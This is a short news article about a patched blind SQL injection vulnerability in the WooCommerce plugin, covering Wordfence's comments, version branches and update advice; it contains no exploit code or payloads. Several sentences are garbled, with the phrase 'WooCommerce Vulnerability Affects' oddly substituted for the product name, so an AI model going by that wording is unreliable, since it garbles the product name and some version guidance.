Table of Contents
Millions of users are being affected by a critical vulnerability that has been patched by Woo Commerce, this is affecting publishers who use the WooCommerce plugin. Such users are strongly encouraged to update their plugins if they haven’t already done so.
Due to a severe vulnerability known as SQL Injection WooCommerce Vulnerability Affects automatically pushed the update to affected publishers.
Some publishers report that their sites have not yet received the updates, even though the updates are automatic. If the site is not yet updated to the latest version of your WooCommerce version branch, you should manually update it.
SQL Injection Vulnerability:
An SQL Injection is a vulnerability that allows a malicious hacker to manipulate a database in a way that changes how it displays information or behaves in ways it isn’t supposed to, for instance, manipulating the database into revealing a password.
According to WooCommerce Vulnerability Affects itself:
“If a store was affected, the exposed information will be specific to what that site is storing but could include order, customer, and administrative information.” WordFence stated that this is a Blind SQL Injection vulnerability.
“This vulnerability allowed unauthenticated attackers to access arbitrary data in an online store’s database. The Wordfence Threat Intelligence team was able to develop proofs of concept for time-based and boolean-based blind injections and released an initial firewall rule to our Premium customers within hours of the patch.”
WooCommerce sites have not been compromised by widespread attacks. “Wordfence Threat Intelligence has found extremely limited evidence of these attempts and, likely, such attempts were highly targeted.”
A version branch is the number associated with the version a publisher is currently using. It is possible for a publisher to work with the newest version 5.x, an old version 3.x, and an old version 4.x.
Each of those versions, 3, 4 and 5, is considered a branch. Versions 4.x and 5.x of WooCommerce are called branches of the software, and version 5 represents a major upgrade from version 4.
Publishers may find updating from version 4.x to 5.x disruptive.
WooCommerce released a patch that closes the vulnerability for each branch to accommodate those publishers. In other words, if a site has WooCommerce version 4.x, they should update to at least version 4.8.1, which is the most recent version of the 4.x branch.
While the latest version of older branches is patched, the official announcement recommends updating to the very latest version of WooCommerce, currently version 5.5.1.
“we still highly recommend you ensure that you’re using the latest versions of WooCommerce and WooCommerce Blocks (5.5.1).”
Inadvertently, that statement may have caused a little confusion about how far up the version branch publishers should update.
Some publishers have wondered if they’re using version 4.x, if it’s safe, or should they update to the latest version of WooCommerce Vulnerability Affects , currently version 5.5.1?